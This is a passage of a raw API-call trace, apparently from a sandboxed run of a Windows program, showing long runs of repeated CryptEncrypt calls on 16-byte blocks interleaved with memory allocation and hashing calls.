pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.520] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.520] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.520] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.520] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.520] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.520] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.520] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.520] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.520] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.520] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.520] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.521] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.521] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.521] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.521] malloc (_Size=0x1fd) returned 0x3d81e60 [0157.521] free (_Block=0x0) [0157.521] free (_Block=0x3def010) [0157.521] malloc (_Size=0x1fd) returned 0x3def010 [0157.521] free (_Block=0x0) [0157.521] CryptDuplicateHash (in: hHash=0x432c78, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fb34 | out: phHash=0x339fb34) returned 1 [0157.521] CryptHashData (hHash=0x432cf8, pbData=0x3def010, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0157.521] malloc (_Size=0x14) returned 0x3f65340 [0157.521] free (_Block=0x0) [0157.521] CryptGetHashParam (in: hHash=0x432cf8, dwParam=0x2, pbData=0x3f65340, pdwDataLen=0x339faec, dwFlags=0x0 | out: pbData=0x3f65340, pdwDataLen=0x339faec) returned 1 [0157.521] CryptHashData (hHash=0x432c78, pbData=0x3def010, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0157.521] free (_Block=0x3f65340) [0157.521] CryptDestroyHash (hHash=0x432cf8) returned 1 [0157.521] free (_Block=0x3def010) [0157.521] free (_Block=0x606108) [0157.522] malloc (_Size=0x1fd) returned 0x606108 [0157.522] free (_Block=0x0) [0157.522] malloc (_Size=0x1f2) returned 0x3def010 [0157.522] free (_Block=0x0) [0157.522] malloc (_Size=0x1f2) returned 0x3def210 [0157.522] free (_Block=0x0) [0157.522] free (_Block=0x0) [0157.522] free (_Block=0x3def010) [0157.522] free (_Block=0x3def210) [0157.522] free (_Block=0x606108) [0157.523] free (_Block=0x3d81e60) [0157.523] malloc (_Size=0x1fd) returned 0x606108 [0157.523] free (_Block=0x0) [0157.523] malloc (_Size=0x1fd) returned 0x3d81e60 [0157.523] free (_Block=0x0) [0157.523] free (_Block=0x0) [0157.523] free (_Block=0x606108) [0157.523] malloc (_Size=0x1fd) returned 0x606108 [0157.523] free (_Block=0x0) [0157.523] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.523] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.524] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.524] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.524] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.524] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.524] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.524] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.524] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.524] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.524] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.524] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.524] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.524] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.525] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.525] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.525] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.525] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.525] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.525] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.525] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.525] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.525] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.525] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.525] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.525] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.525] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.525] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.525] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.526] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.526] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.526] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.526] malloc (_Size=0x1fd) returned 0x3def010 [0157.526] free (_Block=0x0) [0157.526] free (_Block=0x3d81e60) [0157.526] free (_Block=0x606108) [0157.526] malloc (_Size=0x1fd) returned 0x606108 [0157.526] free (_Block=0x0) [0157.526] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.526] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.526] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.526] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.526] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.526] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.526] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.527] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.527] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.527] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.527] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.527] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.527] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.527] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.527] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.527] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.527] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.527] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.527] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.527] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.527] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.527] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.527] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.528] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.528] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.528] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.528] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.528] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.528] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.528] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.528] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.528] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.528] malloc (_Size=0x1fd) returned 0x3d81e60 [0157.528] free (_Block=0x0) [0157.528] free (_Block=0x3def010) [0157.528] malloc (_Size=0x1fd) returned 0x3def010 [0157.528] free (_Block=0x0) [0157.528] CryptDuplicateHash (in: hHash=0x432c78, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fb34 | out: phHash=0x339fb34) returned 1 [0157.528] CryptHashData (hHash=0x432e78, pbData=0x3def010, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0157.528] malloc (_Size=0x14) returned 0x3f65280 [0157.529] free (_Block=0x0) [0157.529] CryptGetHashParam (in: hHash=0x432e78, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x339faec, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x339faec) returned 1 [0157.529] CryptHashData (hHash=0x432c78, pbData=0x3def010, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0157.529] free (_Block=0x3f65280) [0157.529] CryptDestroyHash (hHash=0x432e78) returned 1 [0157.529] free (_Block=0x3def010) [0157.529] free (_Block=0x606108) [0157.529] malloc (_Size=0x1fd) returned 0x606108 [0157.529] free (_Block=0x0) [0157.529] malloc (_Size=0x1f2) returned 0x3def010 [0157.529] free (_Block=0x0) [0157.529] malloc (_Size=0x1f2) returned 0x3def210 [0157.529] free (_Block=0x0) [0157.529] free (_Block=0x0) [0157.529] free (_Block=0x3def010) [0157.530] free (_Block=0x3def210) [0157.530] free (_Block=0x606108) [0157.530] free (_Block=0x3d81e60) [0157.530] malloc (_Size=0x1fd) returned 0x606108 [0157.530] free (_Block=0x0) [0157.530] malloc (_Size=0x1fd) returned 0x3d81e60 [0157.530] free (_Block=0x0) [0157.530] free (_Block=0x0) [0157.530] free (_Block=0x606108) [0157.530] malloc (_Size=0x1fd) returned 0x606108 [0157.530] free (_Block=0x0) [0157.530] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.530] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.530] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.531] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.531] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.531] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.531] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.531] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.531] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.531] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.531] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.531] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.531] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.531] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.531] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.531] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.531] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.531] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.531] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: 